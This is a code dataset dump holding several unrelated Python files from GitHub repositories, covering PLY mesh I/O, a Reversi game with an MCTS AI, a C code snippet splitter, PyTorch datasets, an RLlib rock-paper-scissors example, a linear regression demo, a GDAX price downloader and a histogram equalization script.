Extra header comment (optional).\n \"\"\"\n if pts_colors is not None:\n pts_colors = np.array(pts_colors)\n assert len(pts) == len(pts_colors)\n\n valid_pts_count = 0\n for pt_id, pt in enumerate(pts):\n if not np.isnan(np.sum(pt)):\n valid_pts_count += 1\n\n f = open(path, \"w\")\n f.write(\n \"ply\\n\"\n \"format ascii 1.0\\n\"\n # 'format binary_little_endian 1.0\\n'\n )\n\n if texture_file is not None:\n f.write(\"comment TextureFile {}\\n\".format(texture_file))\n\n if extra_header_comments is not None:\n for comment in extra_header_comments:\n f.write(\"comment {}\\n\".format(comment))\n\n f.write(\n \"element vertex \" + str(valid_pts_count) + \"\\n\" \"property float x\\n\" \"property float y\\n\" \"property float z\\n\"\n )\n if pts_normals is not None:\n f.write(\"property float nx\\n\" \"property float ny\\n\" \"property float nz\\n\")\n if pts_colors is not None:\n f.write(\"property uchar red\\n\" \"property uchar green\\n\" \"property uchar blue\\n\")\n if texture_uv is not None:\n f.write(\"property float texture_u\\n\" \"property float texture_v\\n\")\n if faces is not None:\n f.write(\"element face \" + str(len(faces)) + \"\\n\" \"property list uchar int vertex_indices\\n\")\n if texture_uv_face is not None:\n f.write(\"property list uchar float texcoord\\n\")\n f.write(\"end_header\\n\")\n\n format_float = \"{:.4f}\"\n format_2float = \" \".join((format_float for _ in range(2)))\n format_3float = \" \".join((format_float for _ in range(3)))\n format_int = \"{:d}\"\n format_3int = \" \".join((format_int for _ in range(3)))\n\n # Save vertices.\n for pt_id, pt in enumerate(pts):\n if not np.isnan(np.sum(pt)):\n f.write(format_3float.format(*pts[pt_id].astype(float)))\n if pts_normals is not None:\n f.write(\" \")\n f.write(format_3float.format(*pts_normals[pt_id].astype(float)))\n if pts_colors is not None:\n f.write(\" \")\n f.write(format_3int.format(*pts_colors[pt_id].astype(int)))\n if texture_uv is not None:\n f.write(\" \")\n f.write(format_2float.format(*texture_uv[pt_id].astype(float)))\n f.write(\"\\n\")\n\n # Save faces.\n if faces is not None:\n for face_id, face in enumerate(faces):\n line = \" \".join(map(str, map(int, [len(face)] + list(face.squeeze()))))\n if texture_uv_face is not None:\n uv = texture_uv_face[face_id]\n line += \" \" + \" \".join(map(str, [len(uv)] + map(float, list(uv.squeeze()))))\n f.write(line)\n f.write(\"\\n\")\n\n f.close()\n\n\ndef save_ply_float_color(path, pts, pts_colors=np.array([]), pts_normals=np.array([]), faces=np.array([])):\n # https://github.com/thodan/sixd_toolkit/blob/master/pysixd/inout.py\n \"\"\"Saves a 3D mesh model to a PLY file.\n\n :param path: Path to the resulting PLY file.\n :param pts: nx3 ndarray\n :param pts_colors: nx3 ndarray\n :param pts_normals: nx3 ndarray\n :param faces: mx3 ndarray\n \"\"\"\n pts_colors = np.array(pts_colors)\n if pts_colors.size != 0:\n assert len(pts) == len(pts_colors)\n\n valid_pts_count = 0\n for pt_id, pt in enumerate(pts):\n if not np.isnan(np.sum(pt)):\n valid_pts_count += 1\n\n f = open(path, \"w\")\n f.write(\n \"ply\\n\"\n \"format ascii 1.0\\n\"\n # 'format binary_little_endian 1.0\\n'\n \"element vertex \" + str(valid_pts_count) + \"\\n\"\n \"property float x\\n\"\n \"property float y\\n\"\n \"property float z\\n\"\n )\n if pts_normals.size != 0:\n f.write(\"property float nx\\n\" \"property float ny\\n\" \"property float nz\\n\")\n if pts_colors.size != 0:\n f.write(\"property float red\\n\" \"property float green\\n\" \"property float blue\\n\")\n if faces.size != 0:\n f.write(\"element face \" + str(len(faces)) + \"\\n\" \"property list uchar int vertex_indices\\n\")\n f.write(\"end_header\\n\")\n\n format_float = \"{:.4f}\"\n format_3float = \" \".join((format_float for _ in range(3)))\n format_int = \"{:d}\"\n # format_3int = \" \".join((format_int for _ in range(3)))\n for pt_id, pt in enumerate(pts):\n if not np.isnan(np.sum(pt)):\n f.write(format_3float.format(*pts[pt_id].astype(float)))\n if pts_normals.size != 0:\n f.write(\" \")\n f.write(format_3float.format(*pts_normals[pt_id].astype(float)))\n if pts_colors.size != 0:\n f.write(\" \")\n f.write(format_3float.format(*pts_colors[pt_id].astype(float)))\n f.write(\"\\n\")\n for face in faces:\n f.write(\" \".join(map(str, map(int, [len(face)] + list(face.squeeze())))) + \" \")\n f.write(\"\\n\")\n f.close()\n\n\ndef obj_vtx(filename):\n \"\"\"borrow from glumpy:\n\n https://github.com/glumpy/glumpy/blob/master/glumpy/data/__init__.py.\n \"\"\"\n V = [] # vertex\n for lineno, line in enumerate(open(filename)):\n if line[0] == \"#\":\n continue\n values = line.strip().split(\" \")\n code = values[0]\n values = values[1:]\n # vertex (v)\n if code == \"v\":\n V.append([float(x) for x in values])\n # Building the vertices\n V = np.array(V, dtype=np.float32)\n return V\n\n\nif __name__ == \"__main__\":\n # test load (binary/text) ply model\n train_model_dir = \"data/BOP_DATASETS/lm_full/models\"\n val_model_dir = \"data/BOP_DATASETS/lm_full/models_eval\"\n obj_id = 1\n model_train = load_ply(osp.join(train_model_dir, \"obj_{:06d}.ply\".format(obj_id)))\n print(\"train\", model_train[\"pts\"].shape, model_train[\"pts\"].min(0), model_train[\"pts\"].max(0))\n model_val = load_ply(osp.join(val_model_dir, \"obj_{:06d}.ply\".format(obj_id)))\n print(\"val\", model_val[\"pts\"].shape, model_val[\"pts\"].min(0), model_val[\"pts\"].max(0))\n \"\"\"\n # test PlyData and load_ply\n model_dir = \"data/LINEMOD_6D/models\"\n cls_name = \"ape\"\n model_path = osp.join(model_dir, \"{0}/{0}_sphere.ply\".format(cls_name))\n model = load_ply(model_path)\n print(model.keys())\n model_indices = model[\"faces\"].astype(np.int32)\n # print(model_indices)\n\n from plyfile import PlyData\n\n data = PlyData.read(model_path)\n print(data[\"vertex\"])\n vertex_indices = data[\"face\"][\"vertex_indices\"]\n # print(vertex_indices)\n indices = np.asarray(list(vertex_indices), np.uint32)\n # print(indices)\n\n print(np.array_equal(model_indices, indices))\n \"\"\"\n","repo_name":"THU-DA-6D-Pose-Group/GDR-Net","sub_path":"lib/pysixd/inout.py","file_name":"inout.py","file_ext":"py","file_size_in_byte":32484,"program_lang":"python","lang":"en","doc_type":"code","stars":213,"dataset":"github-code","pt":"37"} +{"seq_id":"7563307042","text":"# -*- coding: utf-8 -*-\n\"\"\"\nhuman player\npython 3.6 +\n\n@author : djh-sudo\nIf you have any question, pls contact me\nat djh113@126.com\n\"\"\"\n\nimport os\nfrom board import *\nimport mcts\nfrom policyValueNet import ValueNet\n\n\nclass Human(object):\n def __init__(self):\n self.player = None\n\n def set_index(self, p: int):\n self.player = p\n\n def action(self, board: Board):\n try:\n print('X is black, O is white | Now is player', self.player)\n location = input(\"input(x, y) you want to go\\n\")\n if isinstance(location, str): # for python3\n x, y = int(location.split(',')[0]), int(location.split(',')[-1])\n point = board.location_to_point([x, y])\n else:\n point = -1\n except Exception as e:\n print(e)\n point = -1\n if point == -1 or point not in board.available:\n print('Invalid position')\n point = self.action(board)\n return point\n\n def __str__(self):\n return \"Human{}\".format(self.player)\n\n\ndef two_human_run():\n width, height = 8, 8\n board = Board(width, height)\n game = Game(board)\n\n h1 = Human()\n h2 = Human()\n\n game.start_play(h1, h2)\n\n\ndef play_with_AI(model_path: str):\n # assert os.path.exists(model_path), 'Invalid model path!'\n width, height = 8, 8\n board = Board(width, height)\n game = Game(board)\n policy_val_net = ValueNet(width, height, model_path)\n # AI\n mcts_player_AI = mcts.AI_MCTS_Player(policy_val_fun=policy_val_net.policy_value_fn, c=4)\n # Human\n human = Human()\n # start play\n game.start_play(mcts_player_AI, human, shown=True, start_player=1)\n\n\nclass PlayOnline(object):\n def __init__(self):\n self.width = 8\n self.height = 8\n # return obj\n self.is_end = False\n self.who_win = -1\n self.has_error = False\n # parameter\n self.policy_val_net = None\n self.board = None\n self.game = None\n self.mcts_player_AI = None\n\n def init(self, model_path):\n self.policy_val_net = ValueNet(self.width, self.height, model_path)\n self.board = Board(self.width, self.height)\n self.game = Game(self.board)\n self.mcts_player_AI = mcts.AI_MCTS_Player(\n policy_val_fun=self.policy_val_net.policy_value_fn, c=4)\n self.board.init_board(0)\n\n def reset(self):\n self.board.init_board(0)\n\n def two_human_play_online(self, point: int, role: int):\n self.has_error = False\n # Human 1 black piece\n if role in [-1, 1]:\n self.board.draw(point)\n else:\n self.has_error = True\n return {\"error\": self.has_error,\n \"board\": None,\n \"available\": None,\n \"is_end\": None,\n \"who_win\": None,\n \"turn\": None}\n self.is_end, self.who_win = self.board.game_end()\n return {\"error\": self.has_error,\n \"board\": self.board.status.flatten().tolist(),\n \"available\": self.board.available,\n \"is_end\": self.is_end,\n \"who_win\": self.who_win,\n \"turn\": self.board.current_player}\n\n def AI_play_online(self, point: int, role: int):\n self.has_error = False\n # Human black piece\n if role == 1:\n self.board.draw(point)\n # AI write piece\n elif role == -1:\n point = self.mcts_player_AI.action(self.board)\n self.board.draw(point)\n else:\n self.has_error = True\n return {\"error\": self.has_error,\n \"board\": None,\n \"available\": None,\n \"is_end\": None,\n \"who_win\": None,\n \"turn\": None,\n \"point\": None}\n self.is_end, self.who_win = self.board.game_end()\n return {\"error\": self.has_error,\n \"board\": self.board.status.flatten().tolist(),\n \"available\": self.board.available,\n \"is_end\": self.is_end,\n \"who_win\": self.who_win,\n \"turn\": self.board.current_player,\n \"point\": str(point)}\n\n\nif __name__ == '__main__':\n # two_human_run()\n play_with_AI('./model/best_94_policy_model')\n\n\n","repo_name":"djh-sudo/AI-Reversi","sub_path":"src/Human.py","file_name":"Human.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32035926359","text":"import argparse\nimport shutil\nimport os\n\nfrom pycparser import c_parser, preprocess_file, c_ast, c_generator\n\nfrom typemap import Typemap, DefinitionMap\nfrom visitors import ScopedNodeVisitor\n\n_DEBUG_CODE_SPLITTER = False\n_DEBUG_BUILD_TYPEMAP = True\n\nclass Unimplemented(Exception):\n pass\n\nclass DefaultClassifier(object):\n def __init__(self):\n pass\n\n # return a score between 0.0. and 1.0 for likelyhood of usefulness.\n def score(self, code):\n return 1.0\n\n\nclass FunctionSplitter(c_ast.NodeVisitor):\n def __init__(self):\n super().__init__()\n\n self.funs = []\n\n def visit_FuncDef(self, node):\n self.funs.append(node)\n\nclass CodeSplitter(c_ast.NodeVisitor):\n def __init__(self):\n super().__init__()\n\n self.snips = []\n\n # Return whether this is a snipable type.\n # Most types are not snippable --- compound is\n # dealt with as a special case.\n def is_snippable_type(self, node):\n name = node.__class__.__name__\n\n return name in ['For', 'While', 'Case', 'DoWhile', 'Enumerator', 'If']\n\n def visit(self, node):\n # Check if this is a sane node to split out:\n generator = c_generator.CGenerator()\n if _DEBUG_CODE_SPLITTER:\n print(\"Visiting node type \", node.__class__.__name__)\n print(\"Visiting \", generator.visit(node))\n\n if self.is_snippable_type(node):\n self.snips.append(node)\n\n super().visit(node)\n\n # Special case for visiting a sequence: we add\n # every ordered subsequence, not every sequence\n # in total.\n def visit_Compound(self, node):\n child_seqs = []\n\n for (name, node) in node.children():\n child_seqs.append(node)\n\n # Add every subset of this.\n for i in range(0, len(child_seqs)):\n for j in range(0, len(child_seqs)):\n if i < j:\n new_compound = c_ast.Compound(child_seqs[i:j])\n self.snips.append(new_compound)\n\n # Recurse as normal.\n super().generic_visit(node)\n\n# Build a typemap. The typemap goes from nesting number -> name -> ID.\n# \nclass BuildTypemap(ScopedNodeVisitor):\n def __init__(self):\n super().__init__()\n\n self.typemaps = Typemap()\n self.current_id = -1\n self.definition_maps = DefinitionMap()\n self.ids_stack = []\n\n def is_scoped_type(self, name):\n return name in ['FuncDecl', 'Compound', 'For', 'While', 'DoWhile', 'Switch']\n\n def visit(self, node, id):\n node_name = node.__class__.__name__\n\n if self.is_scoped_type(node_name):\n if _DEBUG_BUILD_TYPEMAP:\n print (\"Entering new scope: \", node_name)\n # Create a new level of nesting in the typemap.\n self.typemaps.add_nest(id, self.current_id)\n self.definition_maps.add_nest(id, self.current_id)\n\n self.ids_stack.append(self.current_id)\n\n self.current_id = id\n elif _DEBUG_BUILD_TYPEMAP:\n print(\"Not entering new scope: \", node_name)\n\n super().visit(node, id)\n\n def visit_Decl(self, node, id):\n if _DEBUG_BUILD_TYPEMAP:\n print (\"Visiting decl :\", node.name)\n self.typemaps.add_type(node.name, node.type, self.current_id)\n\n # Need to manually recurse -- some defs are\n # e.g. functions\n for typ, child in node.children():\n self.visit(child, self.id_for(child))\n\n def visit_Typedef(self, node, id):\n self.definition_maps.add(node.name, node.type)\n\n # Need to manually recurse -- some defs are\n # e.g. functions\n for typ, child in node.children():\n self.visit(child, self.id_for(child))\n\n def unvisit(self, node, id):\n node_name = node.__class__.__name__\n\n if self.is_scoped_type(node_name):\n if _DEBUG_BUILD_TYPEMAP:\n print(\"Exiting scope for \", node_name)\n\n self.typemaps.unnest()\n self.definition_maps.unnest()\n\n self.current_id = self.ids_stack.pop()\n\n super().unvisit(node, id)\n\n# Given a snip, get the undefined components of\n# that function: split into parameters that should\n# be passed and types that need to be defined.\nclass GetParams(ScopedNodeVisitor):\n def __init__(self):\n super().__init__()\n\n self.params = []\n # Dict from scoping to the set of vairables\n # defined at that nesting.\n self.defined_variables = {}\n self.current_nesting = -1 # IDs start from 0.\n self.nesting_stack = []\n\n def is_scoped_type(self, name):\n return name in ['Compound', 'For', 'While', 'DoWhile', 'Switch']\n\n def visit(self, node, id):\n node_name = node.__class__.__name__\n\n # if entering scope, set it up properly.\n if self.is_scoped_type(node_name):\n self.nesting_stack.append(self.current_nesting)\n self.current_nesting = id\n self.defined_variables[self.current_nesting] = set()\n\n super().visit(node, id)\n\n def unvisit(self, node, id):\n node_name = node.__class__.__name__\n\n # if exiting scope, then wind up the stack.\n if self.is_scoped_type(node_name):\n self.current_nesting = self.nesting_stack.pop()\n del self.defined_variables[self.current_nesting]\n\n super().unvisit(node, id)\n\n # check that this is defined\n def visit_ID(self, node, id):\n if self.is_defined(node.name):\n pass\n else:\n self.params.append(node.name)\n\n # Add a new declaration o\n def visit_Decl(self, node, id):\n self.defined_variables[self.current_nesting].add(node.name)\n\n # Go through the def stack to figure out if this is currently defined\n def is_defined(self, name):\n current_nest = self.current_nesting\n nest = self.nesting_stack[:]\n\n # go through the hierachy of type windows.\n while len(nest) > 0:\n if name in self.defined_variables[current_nest]:\n return True\n else:\n current_nest = nest.pop()\n\n # one last check as self.current_nesting is not included\n # on the stack.\n return name in self.defined_variables[current_nest]\n\n\n# Generate a function header for a snippet.\n# take a typemap that has both the types\n# for each variable name and the definitoin lookup\n# map so a whole chunk of code can be created.\ndef generate_functions(snippet, snippet_nesting, typemap_walk):\n if snippet.__class__.__name__ == 'FuncDef':\n # Already a function :)\n return snippet\n\n # Build a function header and body.\n param_getter = GetParams()\n param_getter.start_visit(snippet)\n\n params_list = []\n # Get the variables and types that we have to create:\n for param in param_getter.params:\n params_list.append(\n param.\n TODO\n )\n\n func_type = IdentifierType(['void'])\n func_args = ParamList([ ])\n decl = FuncDecl(func_args, func_type)\n func = FuncDef(decl, param_decls, snippet)\n\n\ndef get_typemap(code):\n v = BuildTypemap()\n\n for item_def in code.ext:\n # Note that there is a wee bug by splitting\n # there here, which is that a function may appear\n # to be undefined in its own body.\n v.start_visit(item_def.decl)\n v.start_visit(item_def.body)\n\n return v\n\n\ndef load_code(code_path):\n preprocessed = preprocess_file(code_path)\n parser = c_parser.CParser()\n ast = parser.parse(preprocessed)\n\n return ast\n\ndef load_classifier(mode):\n # TODO --- properly load based on name provided\n if mode == 'DefaultClassifier':\n return DefaultClassifier()\n raise Unimplemented()\n\ndef generate_options(args, code):\n # first load the classifier;\n classifier = load_classifier(args.classification_mode)\n\n if args.sub_function:\n # TODO --- gereate all the sane snips.\n v = CodeSplitter()\n v.visit(code)\n snips = v.snips\n else:\n v = FunctionSplitter()\n v.visit(code)\n snips = v.funs\n\n snip_score_pairs = []\n for snip in snips:\n # Get the score for each snip:\n score = classifier.score(snip)\n snip_score_pairs.append((snip, score))\n\n # Sort:\n sorted_snips = sorted(snip_score_pairs, key=lambda x: x[1], reverse=True)\n\n # Return top-N:\n returned = [snip[0] for snip in sorted_snips[:args.number_to_generate]]\n return returned\n\ndef output_options(args, options):\n if os.path.exists(args.output_folder):\n shutil.rmtree(args.output_folder)\n\n os.mkdir(args.output_folder)\n\n generator = c_generator.CGenerator()\n\n choice = 0\n for opt in options:\n with open(args.output_folder + '/' + str(choice) + '.c', 'w') as f:\n f.write(generator.visit(opt))\n choice += 1\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"Snip functions out of C files\")\n\n parser.add_argument(\"c_file\")\n parser.add_argument(\"--classification-mode\", default=\"DefaultClassifier\", dest='classification_mode')\n\n parser.add_argument('--sub-function', default=False, action='store_true', dest='sub_function')\n parser.add_argument('--number-to-generate', default=10, type=int, dest='number_to_generate')\n parser.add_argument('--output-folder', default='output', dest='output_folder')\n\n args = parser.parse_args()\n\n ast = load_code(args.c_file)\n typemap = get_typemap(ast)\n\n options = generate_options(args, ast)\n functions = generate_functions(args, options, typemap)\n\n output_options(args, options)\n","repo_name":"j-c-w/classifier","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23836394850","text":"import glob\nimport random\nimport os\nimport cv2\n\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport numpy as np\nimport torchvision.transforms as transforms\n\nclass ImageDataset(Dataset):\n def __init__(self, root, transforms_=None, unaligned=False, mode='train'):\n self.transform = transforms.Compose(transforms_)\n self.unaligned = unaligned\n\n self.files_A = sorted(glob.glob(os.path.join(root, '%s/D' % mode) + '/*.*'))\n self.files_B = sorted(glob.glob(os.path.join(root, '%s/B' % mode) + '/*.*'))\n\n def __getitem__(self, index):\n item_A = self.transform(Image.open(self.files_A[index % len(self.files_A)]))\n\n if self.unaligned:\n item_B = self.transform(Image.open(self.files_B[random.randint(0, len(self.files_B) - 1)]))\n else:\n item_B = self.transform(Image.open(self.files_B[index % len(self.files_B)]))\n\n return {'A': item_A, 'B': item_B}\n\n def __len__(self):\n return max(len(self.files_A), len(self.files_B))\n\n\nclass CharDataset(Dataset):\n def __init__(self, root, transforms_=None, unaligned=False, mode='train'):\n self.transform = transforms.Compose(transforms_)\n self.unaligned = unaligned\n\n self.files_A = sorted(glob.glob(os.path.join(root, '%s/A' % mode) + '/*.*'))\n\n def __getitem__(self, index):\n\n item_A = self.transform(Image.open(self.files_A[index % len(self.files_A)]))\n return {'A': item_A, 'label': torch.tensor(index)}\n\n def __len__(self):\n return len(self.files_A)\n\n\nif __name__ == '__main__':\n\n dir_root = 'datasets/seq/train'\n img_dirs_part = os.path.join(dir_root,'imgs_ske')\n print(img_dirs_part)\n for folder_name in glob.glob(img_dirs_part+'/*'):\n for img_name in sorted(glob.glob(folder_name + '/*.jpg'))[1:]:\n img = cv2.imread(img_name)\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n succ = cv2.imwrite(img_name, img[:,:,0])\n\n","repo_name":"hzm2016/Robot-Teaching-Assiantant","sub_path":"gan/datasets/base_datasets.py","file_name":"base_datasets.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35764989970","text":"\"\"\"A simple multi-agent env with two agents playing rock paper scissors.\n\nThis demonstrates running the following policies in competition:\n (1) heuristic policy of repeating the same move\n (2) heuristic policy of beating the last opponent move\n (3) LSTM/feedforward PG policies\n (4) LSTM policy with custom entropy loss\n\"\"\"\n\nimport argparse\nfrom gym.spaces import Discrete\nimport random\n\nfrom ray import tune\nfrom ray.rllib.agents.pg import PGTrainer, PGTFPolicy, PGTorchPolicy\nfrom ray.rllib.agents.registry import get_agent_class\nfrom ray.rllib.examples.env.rock_paper_scissors import RockPaperScissors\nfrom ray.rllib.examples.policy.rock_paper_scissors_dummies import \\\n BeatLastHeuristic, AlwaysSameHeuristic\nfrom ray.rllib.utils.framework import try_import_tf, try_import_torch\nfrom ray.rllib.utils.test_utils import check_learning_achieved\n\ntf = try_import_tf()\ntorch, _ = try_import_torch()\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--torch\", action=\"store_true\")\nparser.add_argument(\"--as-test\", action=\"store_true\")\nparser.add_argument(\"--stop-iters\", type=int, default=150)\nparser.add_argument(\"--stop-reward\", type=float, default=1000.0)\nparser.add_argument(\"--stop-timesteps\", type=int, default=100000)\n\n\ndef run_same_policy(args, stop):\n \"\"\"Use the same policy for both agents (trivial case).\"\"\"\n config = {\n \"env\": RockPaperScissors,\n \"framework\": \"torch\" if args.torch else \"tf\",\n }\n\n results = tune.run(\"PG\", config=config, stop=stop)\n\n if args.as_test:\n # Check vs 0.0 as we are playing a zero-sum game.\n check_learning_achieved(results, 0.0)\n\n\ndef run_heuristic_vs_learned(args, use_lstm=False, trainer=\"PG\"):\n \"\"\"Run heuristic policies vs a learned agent.\n\n The learned agent should eventually reach a reward of ~5 with\n use_lstm=False, and ~7 with use_lstm=True. The reason the LSTM policy\n can perform better is since it can distinguish between the always_same vs\n beat_last heuristics.\n \"\"\"\n\n def select_policy(agent_id):\n if agent_id == \"player1\":\n return \"learned\"\n else:\n return random.choice([\"always_same\", \"beat_last\"])\n\n config = {\n \"env\": RockPaperScissors,\n \"gamma\": 0.9,\n \"num_workers\": 0,\n \"num_envs_per_worker\": 4,\n \"rollout_fragment_length\": 10,\n \"train_batch_size\": 200,\n \"multiagent\": {\n \"policies_to_train\": [\"learned\"],\n \"policies\": {\n \"always_same\": (AlwaysSameHeuristic, Discrete(3), Discrete(3),\n {}),\n \"beat_last\": (BeatLastHeuristic, Discrete(3), Discrete(3), {}),\n \"learned\": (None, Discrete(3), Discrete(3), {\n \"model\": {\n \"use_lstm\": use_lstm\n },\n \"framework\": \"torch\" if args.torch else \"tf\",\n }),\n },\n \"policy_mapping_fn\": select_policy,\n },\n \"framework\": \"torch\" if args.torch else \"tf\",\n }\n cls = get_agent_class(trainer) if isinstance(trainer, str) else trainer\n trainer_obj = cls(config=config)\n env = trainer_obj.workers.local_worker().env\n for _ in range(args.stop_iters):\n results = trainer_obj.train()\n print(results)\n # Timesteps reached.\n if results[\"timesteps_total\"] > args.stop_timesteps:\n break\n # Reward (difference) reached -> all good, return.\n elif env.player1_score - env.player2_score > args.stop_reward:\n return\n\n # Reward (difference) not reached: Error if `as_test`.\n if args.as_test:\n raise ValueError(\n \"Desired reward difference ({}) not reached! Only got to {}.\".\n format(args.stop_reward, env.player1_score - env.player2_score))\n\n\ndef run_with_custom_entropy_loss(args, stop):\n \"\"\"Example of customizing the loss function of an existing policy.\n\n This performs about the same as the default loss does.\"\"\"\n\n def entropy_policy_gradient_loss(policy, model, dist_class, train_batch):\n logits, _ = model.from_batch(train_batch)\n action_dist = dist_class(logits, model)\n if args.torch:\n # required by PGTorchPolicy's stats fn.\n policy.pi_err = torch.tensor([0.0])\n return torch.mean(-0.1 * action_dist.entropy() -\n (action_dist.logp(train_batch[\"actions\"]) *\n train_batch[\"advantages\"]))\n else:\n return (-0.1 * action_dist.entropy() - tf.reduce_mean(\n action_dist.logp(train_batch[\"actions\"]) *\n train_batch[\"advantages\"]))\n\n policy_cls = PGTorchPolicy if args.torch else PGTFPolicy\n EntropyPolicy = policy_cls.with_updates(\n loss_fn=entropy_policy_gradient_loss)\n\n EntropyLossPG = PGTrainer.with_updates(\n name=\"EntropyPG\", get_policy_class=lambda _: EntropyPolicy)\n\n run_heuristic_vs_learned(args, use_lstm=True, trainer=EntropyLossPG)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n stop = {\n \"training_iteration\": args.stop_iters,\n \"timesteps_total\": args.stop_timesteps,\n \"episode_reward_mean\": args.stop_reward,\n }\n\n run_same_policy(args, stop=stop)\n print(\"run_same_policy: ok.\")\n\n run_heuristic_vs_learned(args, use_lstm=False)\n print(\"run_heuristic_vs_learned(w/o lstm): ok.\")\n\n run_heuristic_vs_learned(args, use_lstm=True)\n print(\"run_heuristic_vs_learned (w/ lstm): ok.\")\n\n run_with_custom_entropy_loss(args, stop=stop)\n print(\"run_with_custom_entropy_loss: ok.\")\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/rllib/examples/rock_paper_scissors_multiagent.py","file_name":"rock_paper_scissors_multiagent.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"41977779156","text":"# import libraries\nimport numpy as np\nfrom sklearn import datasets, linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# load data\ndiabetes = datasets.load_diabetes()\nX = diabetes.data[:, np.newaxis, 2]\n\n# splitting data\nX_train = X[:-30]\nX_test = X[-30:]\ny_train = diabetes.target[:-30]\ny_test = diabetes.target[-30:]\n\n# create model\nLReg = linear_model.LinearRegression()\n\n# train model\nLReg.fit(X_train, y_train)\n\n# make predict\ny_pred = LReg.predict(X_test)\n\n# get report\nprint('Coefficients: \\n', LReg.coef_)\nprint(\"Mean squared error: %.2f\" % mean_squared_error(y_test, y_pred))\nprint('Variance score: %.2f' % r2_score(y_test, y_pred))\n","repo_name":"iamraufodilov/LinaerRegression_ML","sub_path":"LinaerRegression_ML/LinaerRegression_ML.py","file_name":"LinaerRegression_ML.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23622921927","text":" \r\nimport sys\r\nimport time, json, requests, csv, datetime\r\nimport pandas as pd\r\nimport numpy as np\r\n \r\n \r\nurl=\"https://api.gdax.com\"\r\nproduct_id=\"BTC-USD\"\r\n \r\ntoday = datetime.datetime.now()\r\n\r\n \r\n \r\n \r\ntitles = ('time','low','high','open','close','volume')\r\n\r\n \r\n \r\ndef getProductHistoricRates(product='', start='', end='', granularity=''):\r\n\tpayload = { \"start\" : start, \"end\" : end,\"granularity\" : granularity}\r\n\tresponse = requests.get(url + '/products/%s/candles' % (product), params=payload)\r\n\treturn response.json()\r\n\t \r\n\r\ndef getdata(granul):\r\n\tlenny=1\r\n\tx=0\r\n\ty=0\r\n\tthree_hours = datetime.timedelta(minutes=3*granul)\r\n\tname = 'gdax_'+ str(granul) +'.csv'\r\n\twith open(name,'w') as fd:\r\n\t\t\twriter = csv.writer(fd)\r\n\t\t\twriter.writerow(['time','low','high','open','close','volume'])\r\n\twhile lenny > 0 or y<30:\r\n\t\tx = x + 1\r\n\t\ttdelta = datetime.timedelta(minutes=3 *x *granul)\r\n\t\tendtime = today - tdelta\r\n\t\tstarttime = endtime - three_hours\r\n\t\ttry:\r\n\t\t\tall_data =[]\r\n\t\t\tdata = getProductHistoricRates(product=product_id,start=starttime,end=endtime,granularity=granul)\r\n\t\t\tfor i in data:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tall_data.append(i)\r\n\t\t\t\t\ty = 0\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\t\t\twith open(name,'a') as fd:\r\n\t\t\t\tfor j in all_data:\r\n\t\t\t\t\twriter = csv.writer(fd)\r\n\t\t\t\t\twriter.writerow(j)\r\n\t\t\ty = y + 1\r\n\t\t\tlenny = len(data)\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\tif lenny == 0:\r\n\t\t\ty = y + 1\r\n\t\tprint ('Data:',lenny,'_',starttime,'_',endtime)\r\n\t\ttime.sleep(1)\r\n\r\n\tprint ('y=',y)\r\n\r\n'''\r\nNext, fill in seconds that are missing in the data\r\n'''\r\n#getdata(60)\r\ndirectory = 'C:\\\\Code\\\\btc\\\\Trader\\\\'\r\nname = directory+'gdax_'+ str(60) +'.csv'\r\nprint (name)\r\ndf = pd.read_csv(name,error_bad_lines=False)\r\ndf = pd.DataFrame(df)\r\nprint(df.head())\r\ndf['time']=pd.to_datetime(df['time'],unit='s')\r\nprint (df.head())\r\nprint (len(df))\r\ndf.to_csv(name)\r\nprint (starttime,'to',today)","repo_name":"themandalore/btc_trader","sub_path":"cb_data.py","file_name":"cb_data.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"32118552468","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n###############################################################################################\ndef histogram_equalization(image):\n global histogram\n\n # Calculate histogram values for grayscale image\n if len(image.shape) == 2:\n histogram = np.zeros(8, dtype=np.uint8)\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n histogram[image[i, j]] += 1\n\n # Calculate running sum\n running_sum = np.zeros(8, dtype=int)\n running_sum[0] = histogram[0]\n for i in range(1, 8):\n running_sum[i] = running_sum[i - 1] + histogram[i]\n\n # Calculate histogram equalization\n pixels_sum = histogram.sum()\n equalized_values = np.zeros(8, dtype=int)\n for i in range(8):\n equalized_values[i] = int(round((7 * running_sum[i]) / pixels_sum))\n\n # Draw histogram equalization\n plt.bar(range(8), equalized_values, color='k')\n # The plt.xlim() function sets the x-axis limits to be between 0 and 256\n plt.xlim([0, 8])\n plt.suptitle('Histogram of Gray Image')\n plt.show()\n\n\n###############################################################################################\n\narr = np.array([[0, 0, 0, 1],\n [1, 1, 1, 2],\n [2, 2, 2, 3],\n [5, 6, 4, 